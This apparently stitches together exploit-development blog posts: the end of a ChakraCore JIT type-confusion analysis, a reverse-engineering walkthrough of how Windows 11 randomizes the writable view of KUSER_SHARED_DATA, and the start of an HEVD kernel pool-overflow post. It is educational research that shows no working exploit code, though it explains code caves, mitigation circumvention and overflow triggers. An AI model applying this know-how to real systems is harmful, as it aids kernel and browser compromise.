Let’s now examine this function by setting a breakpoint on it (please note that the below image bay be low resolution. Right click on it and open it ina new tab to view it if you have trouble seeing it)..

Notice right off the bat we see our call to OP_InitProto, which is indicative that this is our opt() function. Additionally, see the below image. There are no JavaScript operators or ChakraCore functions being used. What we see is pure machine code, as a result of JIT.

More fatally, however, we can see that the R15 register is about to be operated on, at an offset of 0x10. This is indicative R15 holds our o object. This is because o.a = value is set after the OP_InitProto call, meaning that mov qword ptr [r15+10h], r13 is our o.a = value instruction. We also know value is 0x1234, so this is the value that should be in R13.

However, this is where our vulnerability occurs, as opt() doesn’t know o has been updated from representing properties inline to an auxSlots setup. Nor does it make an effort to perform a check on o, as this process has gone through the JIT process! The vulnerability here is that there is no type check in the JIT code, thus, a type confusion occurs.

After hitting our breakpoint, we can see that opt() still treats o as an object with properties stored inlined, and it gladly overwrites the auxSlots pointer with our user supplied value of 0x1234 via the o.a = 0x1234 instruction, because opt() still thinks o.a is located at o+0x10, as ChakraCore didn’t let opt() know otherwise, nor was there a check on the type before the operation! The type confusion reaches its pinnacle here, as an adversary can overwrite the auxSlots pointer with a controlled value!

If we clear all breakpoints and enter g in WinDbg, we can clearly see ChakraCore attempts to access o.a via print(o.a). When ChakraCore goes to fetch property o.a, it does so via auxSlots because of the type transition. However, since opt() corrupted this value, ChakraCore attempts to dereference the auxSlots spot in memory, which contains a value of 0x1234. This is obviously an invalid memory address, as ChakraCore was expecting the legitimate pointer in memory and, thus, an access violation occurs.


As we saw in the previous analysis, JIT compilation has performance benefits, but it also has a pretty large attack surface. So much so that Microsoft has a new mode on Edge called Super Duper Secure Mode which actually disables JIT so all mitigations can be enabled.

Thus far we have seen a full analysis on how we went from POC -> access violation and why this occurred, including configuring an environment for analysis. In part two we will convert out DOS proof-of-concept into a read/write primitive, and then an exploit by gaining code execution and also bypassing CFG within ch.exe. After gaining code execution in ch.exe, to more easily show how code execution is obtained, we will be shifting our focus to a vulnerable build of Edge, where we will also have to bypass ACG in part three. I will see you all at part two!

Peace, love, and positivity :-)

Exploit Development: ASLR - Coming To A KUSER_SHARED_DATA Structure Near You!

23 February 2022 at 00:00


A little while back I came across an interesting tweet that talked about some upcoming changes to KUSER_SHARED_DATA on Insider Preview builds of Windows 11.

This sentiment piqued my interest because KUSER_SHARED_DATA is a structure located at a static virtual address, in the traditional Windows kernel, of 0xfffff78000000000. From an exploitation perspective, this beast of a structure has been abused by adversaries for kernel exploitation, particularly remote kernel exploits, due to its static nature. Although KUSER_SHARED_DATA does not contain any interesting pointers to ntoskrnl.exe, nor is it executable, there is a section of memory that resides within the same page as KUSER_SHARED_DATA that contains no data and, thus, is abusable as a code cave with a static address.

Taking a look, KUSER_SHARED_DATA is 0x738 bytes in size on the latest build of Windows 11 Insider Preview (at the time of this blog post).

You may recall on Windows that a given memory β€œpage” is 0x1000 bytes in size, or 4KB. Since KUSER_SHARED_DATA is 0x738 bytes in size there are still approximately 0x8C8 bytes of memory available for attackers to abuse. These unused bytes, therefore, still assume the same memory permissions as the rest of KUSER_SHARED_DATA, which is that of RW, or read/write. This means the β€œKUSER_SHARED_DATA code cave” is a readable and writable code cave which has a static address. Morten Schenk talked about this technique at his BlackHat 2017 talk, and I have also done a previous blog post outlining abusing this structure for code execution.

If this code cave were to be mitigated, an attacker would need to locate another place in memory to place their shellcode. Yes, it is true an adversary with a read/write primitive could corrupt the page table entry (PTE) corresponding to KUSER_SHARED_DATA in order to make the page writable. At this point, however, an adversary would have already needed to bypass kASLR and have a primitive to write to memory - meaning that an attacker already has, essentially, full control of the system. Where mitigation of this code cave comes into play is by making exploitation more arduous by forcing adversaries to prove they have a way to bypass kASLR before writing some nefarious code to memory. If an attacker cannot write directly to a static address, the attacker would therefore need to locate some other memory region. Thus, this would be classified as a smaller, more niche mitigation. In any case, I still found this an interesting topic to research.

Lastly, before beginning, this blog post is presented in context of ntoskrnl.exe and doesn’t translate to the secure kernel in virtual trust level 1 (VTL 1) when Virtualization-Based Security (VBS) is enabled. As Saar Amar pointed out, this structure is actually randomized in VTL 1.

0xfffff78000000000 Is Now Read-Only

My first thought about possible changes to KUSER_SHARED_DATA was that the memory address would finally (somehow) be completely randomized, especially after Saar’s previous tweet. To validate this I simply passed in the static address of KUSER_SHARED_DATA to the dt command in WinDbg and, to my surprise, the structure was still located at 0xfffff78000000000, after it parsing.

My next thought was to try and write to KUSER_SHARED_DATA, at an offset of 0x800, to look for any unexpected behavior. It was here I realized that KUSER_SHARED_DATA was now read-only, by examining the PTE.

The address provided below, 0xfffffe7bc0000000, is the virtual address of the PTE associated with the virtual address 0xfffff78000000000, or KUSER_SHARED_DATA. You can find the address on your system with the command in Windbg !pte 0xfffff78000000000. I have omitted these commands for readability of this blog, so as to not keep executing this command over and over again. This blog will inform readers what addresses correspond to what and how to find these addresses on your system.

This, at first, made sense. However, after talking with my coworker Yarden Shafir, there are things in KUSER_SHARED_DATA, such as the SystemTime member, which are constantly updated and, therefore, Yarden told me to keep digging, as there obviously was some way KUSER_SHARED_DATA was being written to/updated with a read-only PTE. This also makes sense, as I found out later, because the Dirty bit for the PTE that corresponds with KUSER_SHARED_DATA is set to 0, which means the page hasn’t been written to. So how exactly is this happening?

Armed with the following information, I went to IDA to look for anything interesting.

nt!MmWriteableUserSharedData To The Rescue!

After some searching in IDA for references to either 0xfffff78000000000 or terms like β€œUserShared”, I stumbled across a symbol I hadn’t seen before - nt!MmWriteableUserSharedData. In IDA, this symbol seems to be defined as 0xfffff78000000000.

However, when looking at a live kernel debugging session, I noticed the address seemed to be different. Not only that, after reboot, this address changed!

We can also see that the static 0xfffff78000000000 address and the new symbol both point to identical memory contents.

However, I was not yet satisfied. Were these two separate pages pointing to two separate structures that just contained identical contents? Or were they somehow intertwined? After viewing both of the PTEs in tandem, I confirmed that both of these virtual addresses, although different, both leveraged the same page frame number (PFN). The PTE for the β€œstatic” KUSER_SHARED_DATA and the new symbol nt!MmWriteableSharedUserData can be found with the following commands:

  1. !pte 0xfffff78000000000
  2. !pte poi(nt!MmWriteableSharedUserData)

As mentioned, the address of the PTE which corresponds with the β€œstatic” KUSER_SHARED_DATA structure is 0xfffffe7bc0000000. The address 0xfffffcc340c47010 is the virtual address which corresponds with the PTE of nt!MmWriteableSharedUserData.

A PFN multiplied by the size of a page (0x1000 generally speaking on Windows) will give you the physical address of the corresponding virtual address (in terms of a PTE, the β€œfinal” paging structure used to fetch a 4KB-aligned page). Since both of these virtual addresses contain the same PFN, this means that when converting the PFNs to physical addresses (0xfc1000 in this case), both virtual addresses are backed by the same physical page! We can confirm this by viewing the contents of the physical address backing each virtual address, as well as the virtual addresses themselves.

What we have here are two virtual addresses, with different memory permissions (one is read-only and the other is read/write) backed by one physical page. In other words, there are two virtual addresses with different views of the same physical memory. How is this possible?

tl;dr - Memory Sections

The main β€œgist” of the changes implemented surrounding KUSER_SHARED_DATA is the concept of memory sections. What this means is that a section of memory can essentially be shared by two processes (this is true for the kernel, as is in our case). The way this works is that the same physical memory can be mapped to a range of virtual addresses.

In this case, the new randomized read/write view of KUSER_SHARED_DATA, nt!MmWriteableUserSharedData (a virtual address) is backed by the same physical memory as the β€œstatic” KUSER_SHARED_DATA (another virtual address). This means that now there are two β€œviews” of this structure, as seen below

This means that updating one of the virtual addresses (e.g. nt!MmWriteableSharedUserData) will update the other virtual address (0xfffff78000000000). This is because making a change to one of the virtual addresses will update the physical memory contents. Since the physical memory contents back both virtual addresses, both virtual addresses will receive updates. This provides a method for Windows to keep the old KUSER_SHARED_DATA address, while also allowing a new mapped view that is randomized, to β€œmitigate” the static read/write code cave traditionally found in KUSER_SHARED_DATA. The β€œold” address of 0xfffff78000000000 can now be marked as read-only, as there is a new view of this memory which can be used in its place, which is randomized!

If you were looking for a quick blog to talk about the changes made, that is perfectly okay and I will preface the remainder of this blog by saying that you may stop here if you were looking for a quick rundown of the higher-level details. The rest of this blog will outline the more intricate, lower-level details of the implementation.

If you are interested in how this looks at a bit of a deeper level, in terms of how Windows actually manifested these new updates, like myself, please feel free to read the rest of this blog post! I learned a great amount of technical details in terms of lower-level memory paging concepts, and just wanted to share these thoughts with anyone reading (should anyone care).


Before continuing with the analysis, permit me to introduce two terms. When I refer to the memory address 0xfffff78000000000, the static mapping of KUSER_SHARED_DATA, I will use the term β€œstatic” KUSER_SHARED_DATA from here on out. When I refer to the new β€œrandomized mapping”, I will simply use the symbol name of nt!MmWriteableSharedUserData. This will allow me to delineate each time which β€œversion” I am talking about.

After some dynamic analysis in WinDbg, I discovered the answer to my previous question about how these changes to KUSER_SHARED_DATA were implemented. I first started by setting a breakpoint on ntoskrnl.exe being loaded. It’s possible to do this, in an existing kernel debugging session, with the following commands:

  1. sxe ld nt
  2. .reboot

After the breakpoint is hit, we can actually see that the newly-found symbol nt!MmWriteableUserSharedData points to the β€œstatic” KUSER_SHARED_DATA address.

This is obviously indicative that this symbol is updated further along in the loading process.

While performing some reverse engineering to identify how this happens, I noticed an interesting cross reference to nt!MmWriteableSharedUserData in the function nt!MiProtectSharedUserPage via IDA.

While execution was still paused, as a result of the ntoskrnl.exe breakpoint, I set another breakpoint on the aforesaid function nt!MiProtectSharedUserPage and confirmed, after reaching the new breakpoint, the nt!MmWriteableSharedUserData symbol still pointed to the old 0xfffff78000000000 address.

Even more interesting, the β€œstatic” KUSER_SHARED_DATA’ is still static, readable, and writable at this point in the loading process! The below PTE address of 0xffffb7fbc0000000 is the virtual address of the PTE associated with the virtual address of 0xfffff78000000000. The PTE address has changed due to us rebooting the system as a result of the break-on-load of ntoskrnl.exe. As mentioned, this address can always be found on your system with the command !pte 0xfffff78000000000.

Since we know 0xfffff78000000000, the address of the β€œstatic” KUSER_SHARED_DATA structure, becomes read-only at some point, this is indicative of this function likely being responsible for changing the permissions of this address AND also dynamically filling nt!MmWriteableSharedUserData, especially based on naming convention.

Looking deeper into the disassembly of nt!MiProtectSharedUserPage we can see that the symbol nt!MmWriteableSharedUserData is updated with the value in RDI at the time that this instruction executes. But where does this value come from?

Let’s take a look at the beginning of the function. The first thing that stands out is the kernel-mode address and calls to nt!MI_READ_PTE_LOCK_FREE and nt!Feature_KernelSharedUserDataAaslr__private_IsEnabled (which isn’t very interesting for our purposes).

The kernel-mode address in the image above of 0xfffffb7000000000, outlined in a red box in the Disassembly window of WinDbg , is actually the base of the page table entries (e.g. the address of the PTE array). The second value, the constant of 0x7bc00000000, is the value used to index this PTE array to fetch the PTE associated with the β€œstatic” KUSER_SHARED_DATA. This value (the index into the PTE array) can be found with the following formula:

  1. Converting the target virtual address (in this case, 0xfffff78000000000) into a virtual page number (VPN) by dividing the address by the size of a page (0x1000 in this case)
  2. Multiply the VPN by the size of a PTE (64-bit system = 8 bytes)

We can see this by replicating this formula on the virtual address of 0xfffff78000000000. The resulting value will be the appropriate index into the PTE array to get the PTE associated with the β€œstatic” KUSER_SHARED_DATA. This can be seen in the Command window of WinDbg above.

This means the PTE associated with the β€œstatic” KUSER_SHARED_DATA is going to be passed in to nt!MI_READ_PTE_LOCK_FREE. The address of said PTE is 0xffffb7fbc0000000.

nt!MI_READ_PTE_LOCK_FREE, at a high level, will dereference the contents of the PTE and return them, while also performing a check on the in-scope page table entry to see if it is within the known address space of the PML4E array, which contains an array of PML4 page table entries for usage with the PML4 paging structure. Recall that the PML4 structure is the base paging structure. So, in other words, this ensures that the page table entry provided resides somewhere within the paging structures. This can be seen below.

However, slightly more nuanced, the function is actually checking to see if the page table entry resides within the β€œuser mode paging structures”, known otherwise as the β€œshadow space”. Recall that with KVA Shadow’s implementation, Microsoft’s implementation of Kernel Page-Table Isolation (KPTI), there are now two sets of paging structures: one for kernel mode execution and one for user mode. This mitigation was used to mitigate Meltdown. This check is easily β€œbypassed”, as the PTE is obviously mapped to a kernel mode address and, thus, not represented by the β€œuser mode paging structures”.

nt!MI_READ_PTE_LOCK_FREE then returns the dereferenced contents of the PTE (e.g. the PTE β€œbits”) if the PTE doesn’t reside within the β€œshadow space”. If the PTE does reside in the β€œshadow space”, there are a few more checks performed on the PTE to determine if KVAS is enabled before the contents are returned. This is not too important for the overall changes we are focusing on, from an exploitation perspective, but still a part of the overall β€œprocess”.

Additionally, nt!Feature_KernelSharedUserDataAslr__private_IsEnabled isn’t very useful to us, except for letting us know we are potentially on the right track by the naming convention. This function mainly seems to be for metrics and telemetry gathering about this feature.

Earlier, after the first call to nt!MI_READ_PTE_LOCK_FREE, the contents of the PTE for the β€œstatic” KUSER_SHARED_DATA were copied to a stack address - RSP at an offset of 0x20. This stack address, very similarly, is used in another call to nt!MI_READ_PTE_LOCK_FREE. This, again, isn’t particularly important to us - but it is part of the process.

More interestingly, however, is the fact that nt!MI_READ_PTE_LOCK_FREE dereferences the PTE contents and returns them via RAX. Since the PTE β€œbits” for the β€œstatic” KUSER_SHARED_DATA, which define the memory properties/permissions, are in RAX, they’re then acted upon in the subsequent bitwise-operations to extract the page frame number (PFN) from the PTE of the β€œstatic” KUSER_SHARED_DATA. This value is 0xf52e within the PTE, which has a value of 0x800000000000f52e863.

This PFN will be leveraged later on in a call to nt!MiMakeValidPte. For now, let’s move on.

We can now turn our attention to see that a call to nt!MiReservePtes is about to occur.

Please permit me to quickly provide a brief word on PFN records. A PFN β€œvalue” is technically just an abstract value that, when multiplied by 0x1000 (the size of a page), gives us a physical memory address. This is typically either the address of the next paging structure during the memory paging process, or it is used to fetch a final 4KB-aligned physical memory page if being leveraged by the β€œlast” paging table, the PT (page table).

In addition to this, PFN records are also stored in an array of virtual addresses. This array is known as the PFN database. The reason for this is that the memory manager accesses page table entries via linear (virtual) addresses, which increases performance as the MMU does not need to walk all of the paging structures constantly to fetch PFNs, page table entries, etc. This provides an easy way for the records to just be referenced via an index into an array. This goes for all β€œarrays”, including the PTE array. A function such as nt!MiGetPteAddress performs an index into the corresponding page table array, such as the PTE array (for nt!MiGetPteAddress, PDE array (PDPT entries, done via nt!MiGetPdeAddress), etc.

Knowing this, we can see prior to the call to nt!MiReservePtes that the appropriate index into the PFN database that corresponds to the β€œstatic” KUSER_SHARED_DATA is calculated. This essentially means we are retrieving the virtual address of said PFN record (a MMPFN structure) from the PFN database.

We can see this as the base of the PFN database, 0xffffc38000000000 in this case, is involved in the operation. The final virtual address of 0xffffc380002df8a0 (the virtual address of the PFN record associated with the β€œstatic” KUSER_SHARED_DATA) can be seen below in RBP. It will eventually be used as the second argument in a future function call to nt!MiMakeProtectionPfnCompatible.

We can corroborate this by parsing the above virtual address as a MMPFN structure to see if the PteAddress member corresponds to the known PTE of the β€œstatic” KUSER_SHARED_DATA. As we know, the PTE is located at 0xffffb7fbc0000000.

The PteAddress member of the PFN structure aligns with the virtual address of the PTE associated with the β€œstatic” KUSER_SHARED_DATA - thus confirming this is the associated PFN record with the β€œstatic” KUSER_SHARED_DATA.

This value is then used in a call to nt!MiReservePtes, which we can see from two images ago. We know the first argument for this function will go into the RCX register, per the __fastcall calling convention. This argument is actually a nt!_MI_SYSTEM_PTE_TYPE structure.

According to CodeMachine, when a call to nt!MiReservePtes occurs, this structure is used to define what kind of allocation will occur in order to reserve memory for the PTE being created. Allocations, when requested with nt!MiReservePtes, may be suggestive of a request to allocate a piece of virtual memory from the System PTE region. The System PTE region is used for mapped views of memory, memory descriptor lists (MDLs), and other items. This information, in combination of our searching for an answer as to how two virtual addresses are backed by the same physical page, is very indicative of different β€œviews” of memory being used (e.g. two virtual addresses correspond to one physical address so both virtual addresses contain the same contents but may have different permissions). Additionally, we can confirm that this allocation is coming from the System PTE region, as the VaType member of the nt!_MI_SYSTEM_PTE_TYPE structure is set to 9, which is a value in an enumeration that corresponds to MiVaSystemPtes. This means the allocation, in this case, will come from the System PTE memory region.

As we can see after the call occurs, the return value is a kernel-mode address within the same address space of the System PTE region, as defined by the BasePte member.

At this point, the OS has essentially allocated memory from the System PTE region, which is commonly used for mapping multiple views of memory, in the form of an unfilled PTE structure. The next step will be to properly configure this PTE and assign it to a memory address.

Said process continues with a call to nt!MiMakeProtectionPfnCompatible. As previously mentioned, the second argument for this function will be the virtual address of the PFN record, from the PFN database, associated with the PTE that is applied to the β€œstatic” KUSER_SHARED_DATA.

The first argument passed to nt!MiMakeProtectionPfnCompatible is a constant of 4 (which can be seen 4 screenshots below in the Command window of WinDbg). Where does this value come from? Taking a look at ReactOS we can see two constants that are outlined for memory permissions enforced by PTEs.

According to ReactOS, there is also a function called MI_MAKE_HARDWARE_PTE_KERNEL, which leverages these constants. The prototype and definition can be seen below.

This function provides a combination of the functionality exposed by both nt!MiMakeProtectionPfnCompatible and nt!MiMakeValidPte (which is a function we will see shortly). The value 4, or MM_READWRITE, is actually an index into an array called MmProtectToPteMask. This array is responsible for converting the requested permission of the page (4, or MM_READWRITE) to a PTE-compliant mask.

We can see the first five elements are as follows: {0, PTE_READONLY, PTE_EXECUTE, PTE_EXECUTE_READ, PTE_READWRITE}. From here we can confirm that indexing this array at the index of 4 will retrieve a PTE mask of PTE_READWRITE, which are exactly the memory permissions we would like nt!MmWriteableSharedUserData to assume, as we know this should be the β€œnew mapped view” of KUSER_SHARED_DATA, which is writable. Recall also that the virtual address of the PFN record associated with the β€œstatic” KUSER_SHARED_DATA is used in the function call, via RDX.

After the function call, the return value is a β€œPTE-compatible” mask that represents a readable and writable page.

At this point we have:

  1. An address for our PTE, which is currently empty
  2. A β€œskeleton” for our PTE (e.g. a readable/writable mask to be supplied)

With this in the back of our mind, let’s now turn our attention to the call to nt!MiMakeValidPte.

nt!MiMakeValidPte essentially provides β€œthe rest” of the functionality outlined by the ReactOS function MI_MAKE_HARDWARE_PTE_KERNEL. nt!MiMakeValiePte requires the following information:

  1. Address of the newly created, empty PTE (this PTE will be applied to the virtual address of nt!MmWriteableUserSharedData). This is currently in RCX
  2. A PFN. This is currently in RDX (e.g. not the virtual address from the PFN database, but the raw PFN β€œvalue”)
  3. A β€œPTE-compliant” mask (e.g. our read/write attributes). This is currently in R8

All of this information can be seen above in the previous screenshot.

In terms of β€œmapping different views of the same physical memory”, the most important component here is the value in RDX, which is the actual PFN value of KUSER_SHARED_DATA (the raw value, not the virtual address). Let’s recall first that a PFN, at a high level, is essentially a physical address, when multiplied by the size of a page (0x1000 bytes, or 4KB). This is true, especially in our case, as we are dealing with the most granular type of memory - a 4KB-aligned piece of memory. There are no more paging structures to index, which is usually what a PFN is used for. This means the PFN, in this case, is used to fetch a final, 4KB-aligned memory page.

We know that the function we are executing inside of (nt!MiProtectSharedUserPage) creates a PTE (via nt!MiReservePtes and nt!MiMakeValidPte). As we know, this PTE will be applied to a virtual address and used to map said virtual address to a physical page, essentially through the PFN associated with the PTE. Currently, the PFN that will be used for this mapping is stored in RDX. At a lower level, this value in RDX multiplied by the size of a page (4KB) will be the actual physical page the virtual address is mapped to.

Interestingly enough, this value in RDX, which was previously preserved after the second call to nt!MI_READ_PTE_LOCK_FREE, is the PFN associated with KUSER_SHARED_DATA! In other words, the virtual address we assign this newly created PTE to (which should eventually be nt!MmWriteableUserSharedData) will be backed by KUSER_SHARED_DATA’s physical memory and, thus, when updates are made to the contents of nt!MmWriteableUserSharedData the physical memory backing it will also be updated. Since the β€œstatic” KUSER_SHARED_DATA (0xfffff78000000000) is also backed by THE SAME physical memory it also will receive the updates. Essentially, even though the read-only β€œstatic” KUSER_SHARED_DATA can’t be written to it will still receive updates made by nt!MmWriteableUserSharedData, which is readable and writable. This is because both virtual addresses are backed by the same physical memory. Whatever happens to one of these will happen to the other!

Knowing this means that there is no good reason to have the β€œnormal” (e.g. 0xfffff78000000000) KUSER_SHARED_DATA structure address be anything other than read-only, as there is now another memory address that can be used in its place. The benefit here is that the writable β€œversion” or β€œmapping”, nt!MmWriteableUserSharedData, is randomized!

Moving on now, we are telling the OS we want a valid PTE that is readable and writable, backed by KUSER_SHARED_DATA’s PFN (physical address for all intents and purposes), and will be written to the PTE we have already allocated from the System PTE region (since this memory is being used for mapping β€œviews”).

After executing the function, we can see this is the case!

The next function call, nt!MiPteInShadowRange, essentially just does bounds checking to see if our PTE resides in the shadow space. Recall earlier that with the implementation of Kernel Virtual Address Shadow (KVAS) that paging structures are separated: one set for user mode and one set for kernel mode. The β€œshadow space”, otherwise known as the structures used for user mode addressing, are within the range checked by nt!MiPteInShadowRange. Since we are dealing with a kernel mode page, obviously the PTE it is applied to is not within the β€œshadow space”. It is not really of interest to us for our purposes.

After this function call, a mov qword ptr [rdi], rbx instruction occurs. This updates our allocated PTE, which is still blank, with the proper bits created from our call to nt!MiMakeValidPte! We now have a valid PTE, backed by the same physical memory as KUSER_SHARED_DATA located at the virtual address of 0xfffff78000000000!

At this point, we are just a few instructions away from our target symbol of nt!MmWriteableUserSharedData being updated with the new ASLR’d mapped view of KUSER_SHARED_DATA. Then the β€œstatic” KUSER_SHARED_DATA can be made read-only (recall it is still read/write at this point in the loading process!).

Currently, in RDI, we have the address of the PTE we want to use for our new read/write and randomized mapped view of KUSER_SHARED_DATA (generated via nt!MiReservePtes). The above screenshot shows that there will be some bitwise operations performed on RDI and, as well, we can see that the base of the page table entries will be involved with this operation. These are simply compiler optimizations for converting a given PTE to the virtual address the PTE is applied to.

This is a necessary step, recall, as up until this point we have successfully generated a PTE from the System PTE region and have marked it as read/write, told it to use the β€œstatic” KUSER_SHARED_DATA as the physical memory backing the virtual memory, but we have not actually applied it to the virtual memory address which will be described and mapped by this PTE! This virtual address we want to apply this PTE to will be the value we want to store in nt!MmWriteableUserSharedData!

Let’s again recall the bitwise operations that are in place which will convert the new PTE to the virtual address it backs.

As we know, we have the target PTE in the RDI register. We know the steps to retrieve the PTE associated with a given virtual address are as follows, which indexes the PTE array appropriately:

  1. Convert the virtual address to a virtual page number (VPN) by dividing the virtual address by the size of a page (0x1000 bytes on a standard Window system)
  2. Multiply the above value with the size of a PTE (0x8 bytes on 64-bit system)
  3. Add the value to the base of the page table entry array

This corresponds to indexing the PTE array as follows: PteBaseArray[VPN]. Since we know how to go from a virtual address to a PTE, we should be able to reverse these steps to retrieve the virtual address associated with a given PTE.

With PTE in hand, the β€œreversed” process is as follows:

  1. Subtract the PTE array base address from the PTE sitting in RDI (our target PTE) to extract the index into the PTE array
  2. Divide the value by the size of a PTE (0x8 bytes) to retrieve the virtual page number (VPN)
  3. Multiply this value by the size of a page (0x1000) to retrieve the virtual address

We also know that the compiler generates a sar rdi, 10h instruction which will sign extend the value generated from the above steps. If we replicate this process within WinDbg we can see our final value (0x0000a580a4002000) would be converted to the address 0xffffa580a4002000.

Comparing our computed value with the kernel-produced value, we can see we now have the corresponding virtual address to our PTE, which now is backed by the same physical memory as KUSER_SHARED_DATA and both addresses match up to 0xffffa580a4002000! We can conclude the bitwise operations are part of some macro which converts PTEs to virtual addresses, and this is compiler-optimized code to do so!

This functionality is provided in ReactOS in the form of a function called MI_WRITE_VALID_PTE. As we can see it essentially not only writes the PTE contents to the PTE address (in this case the allocation from the System PTE region via nt!MiReservePtes) but it also fetches the virtual address associated with the PTE through the function MiPteToAddress.

Great! However, there is one last thing we need to do and that is convert the β€œstatic” KUSER_SHARED_DATA address to read-only. We can already see we are queued up for a call to nt!MiMakeProtectionPfnCompatible. In RCX, where the memory permission constant is, we can see a value of 1, or MM_READONLY if we recall earlier from when we created a PTE-compliant mask for the read/write mapping of KUSER_SHARED_DATA. In other words, the only memory β€œpermissions’’ afforded to this page will be read.

RDX, which contains our index into the PFN array, shows we have the PFN associated with the β€œstatic” KUSER_SHARED_DATA by comparing the virtual address of the PTE for the β€œstatic” KUSER_SHARED_DATA (PTE located at 0xffffb7fbc0000000) to the PTE located in the PFN structure, MMPFN. This gives us a PTE-compliant value.

Identically to last time, now just with a read-only page, we setup a call to nt!MiMakeValidPte to assign to the β€œstatic” KUSER_SHARED_DATA read-only permissions, through the virtual address of its PTE (0xffffb7c000000000).

After the call succeeds, a PTE has been generated for use with pages intended to be read-only.

The β€œstatic” KUSER_SHARED_DATA gets updated through the same methods aforementioned (the method provided in ReactOS called MI_WRITE_VALID_PTE).

For our purposes, this is the end of the interesting things that nt!MiProtectSharedUserPage does! We now have two virtual addresses that are backed by KUSER_SHARED_DATA’s physical memory (one read-only, the β€œstatic” 0xfffff78000000000 KUSER_SHARED_DATA structure and a new nt!MmWriteableUserSharedData version which is randomized and read/write)!

We can now see in IDA, for instance, when KUSER_SHARED_DATA needs to be updated, this is done through the new symbol which is randomized and writable. The below image is taken from nt!KiUpdateTime, where we can see several offsets of KUSER_SHARED_DATA are updated (namely 0x328 and 0x320). On the same note, in the same photo, we can see that when members from KUSER_SHARED_DATA are read, Windows goes through the old β€œstatic” hard coded address (in this case, 0xfffff78000000008 and 0xfffff78000000320 in the IDA screenshot).

Exploitability Going Forward and Conclusion

Obviously, the same primitive of abusing this code cave no longer will exist, and one of the last (if not the last) static structure has now been mitigated, which attackers have abused in the past. However, with exploitation today, a kASLR bypass is surely needed to gain code execution. This is a smaller mitigation which forces an adversary to prove they can at least bypass kASLR fully in order to write code somewhere reliably. It goes without saying that it would be possible to β€œbypass” (better word is circumvent, versus β€œbypassing” the underlying feature), if you write to memory early enough in the kernel loading process via a race condition or some other primitive, to write your code to the static 0xfffff78000000000+0x800 KUSER_SHARED_DATA code cave, as we know this structure is still readable and writable when the kernel is first mapped into memory. However, when the kernel fully loads, this region will be read-only. But, nonetheless, it is still possible, due to the initialization happening during the kernel loading. There are public exploits which make use of this primitive, namely my friend and peer chompie1337’s SMBGhost proof-of-concept, so it was definitely worthwhile to pursue to not only raise the bar for attackers, but to break public exploits in their current state. This is a pretty niche change/mitigation, but I thought it nonetheless would be fun to blog about and I learned quite a bit about the System PTE region and memory views along the way.

As always feel free to please reach out with comments, questions, corrections, or suggestions!

Peace, love, and positivity :-)

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

18 July 2021 at 00:00


This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining this information leak vulnerability with the bug outlined in this post, which is a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why pool corruption in the age of the segment heap has had the scope of techniques, in my estimation, lessened from the days of Windows 7.

Due to the release of Windows 11 recently, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise - vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel to execute code to either data-only style attacks or to investigate more novel techniques to bypass VBS and HVCI. This is the direction I hope to start taking my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a processor directive to make this variable 16 on a Windows 64-bit machine, which we are testing from. We now know that the pool chunk that will be allocated from the call to ExAllocatePoolWithTag within TriggerBufferOverfloowNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a β€œpool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack on the pool overflow code to the end, after the for loop which does parsing to extract the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the pool chunk of 16 bytes. The IOCTL for to reach the TriggerBufferOverflowNonPagedPool function is 0x0022204b

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

